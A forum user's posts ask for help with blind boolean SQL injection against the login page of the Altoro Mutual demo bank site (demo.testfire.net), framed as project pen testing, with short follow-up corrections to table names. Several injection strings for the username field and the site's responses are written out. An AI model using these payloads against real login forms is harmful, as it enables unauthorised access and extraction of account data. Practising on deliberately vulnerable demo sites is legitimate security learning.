gunitinug
-
Posts
4 -
Joined
-
Last visited
Posts posted by gunitinug
-
-
correction. it should be APP.contacts table with user column.
-
Quote
ignore the last post
-
Correction. This logs in
admin' and (select count(user) from app.accounts where user not like '%')=0--
But not
admin' and (select count(user) from app.accounts where user not like '%')>0--
-
Hi.
I have to pen test altoro mutual site(https://demo.testfire.net) for a project. The site uses DERBY DB.
I have discovered that its login page is vulnerable to blind boolean sqli.
I have discovered that there is a table called user under schemaname of APP (ie. APP.user).
I typed in
Username: admin' and (select count(user) from app.accounts where user like '%a%')>0--
Password: anythingThis tests whether there is a user that contains a letter 'a'. If the test succeeds altoro mutual site logs in. Otherwise it says "Login Failed: We're sorry, but this username or password was not found in our system. Please try again."
I've tried the same test but this time iterated from a-zA-Z. But it never succeeds in logging in which tells me that maybe Username is not English alphabet. But this is unlikely.
So my problem is I don't know why LIKE operator doesn't return a result that is expected.
I also tried
Username: admin' and (select count(user) from app.accounts where user not like '%a%')>0--
Password: anythingAnd this time every iteration of a-zA-Z logs in. So this result also tells me Username does not contain a letter.
Lastly this one works (it logs in)
Username: admin' and (select count(user) from app.accounts where user not like '%')>0--
Password: anythingCan you help me why LIKE operator fails when user LIKE '%a%' and so on?
THX
Altoro Mutual site
in Security
Posted
sorry APP.accounts table with user column